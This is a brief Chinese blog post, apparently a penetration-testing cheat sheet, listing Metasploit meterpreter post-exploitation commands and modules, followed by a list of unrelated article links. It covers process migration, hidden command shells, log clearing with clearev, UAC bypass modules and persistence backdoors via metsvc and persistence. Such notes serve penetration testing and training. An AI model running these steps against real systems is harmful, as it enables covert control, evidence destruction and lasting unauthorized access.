MSF后渗透常用命令
2024-10-21 02:59:27
一、在meterpreter命令行下常用的操作
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
clearev # 清除日志信息
sysinfo # 查看目标机系统信息
二、后渗透常用的模块
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/enum_patches #补丁信息
绕过UAC
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
三、实现持久化控制
1、metsvc
通过服务(metsvc)启动方式,这种方式操作简单,但是其他攻击者扫描到之后也可以直接利用
2、 persistence
通过启动项启动(persistence)的方式,此方式通过反向连接的方式获得目标主机的权限,此后门存活率更高
最新文章
- Python框架之Tornado(二)请求阶段
- C+命令行+方向键=简易版扫雷
- centos下 Vim快捷键操作命令大全
- nancy中的诊断功能面板1
- win7下eclipse中文字显示过小
- 关于JS的一点summary
- Win64位操作系统无法运行暗黑2战网D2GS的解决办法
- Codeforces Round #327 (Div. 1) B. Chip 'n Dale Rescue Rangers 二分
- union 与struct的空间计算
- Guava源码分析——ServiceManager
- 最新samba.tar.gz安装方法
- C# Ajax 返回json数据--前后台交互
- Java基础学习 —— 对象的克隆
- [转]【C#】分享一个弹出浮动层,像右键菜单那样召即来挥则去
- 安卓抓包https
- Oracle EBS FA 本年折旧
- Paxos 算法 :消息传递一致性
- 自学Python2.1-基本数据类型-字符串str(object) 上
- 1-3Controller之Response
- 第四章 使用Servlet处理HTTP请求
热门文章
- ArcObjects SDK开发 021 开发框架搭建-FrameWork包设计
- Python实验报告(第6章)
- [0x11] 131.直方图中最大的矩形【单调栈】
- 【转载】七个人生工具,终生受益 | SWOT、PDCA、6W2H、SMART、WBS、时间管理、二八原则
- Spring MVC的运行流程
- Java学习笔记:2022年1月2日
- Spring Boot通过Actuator显示git和build的信息
- (16)go-micro微服务jaeger链路追踪
- 【学习笔记】动态树 Link-Cut Tree
- (转载)Python中关键词yield怎么用?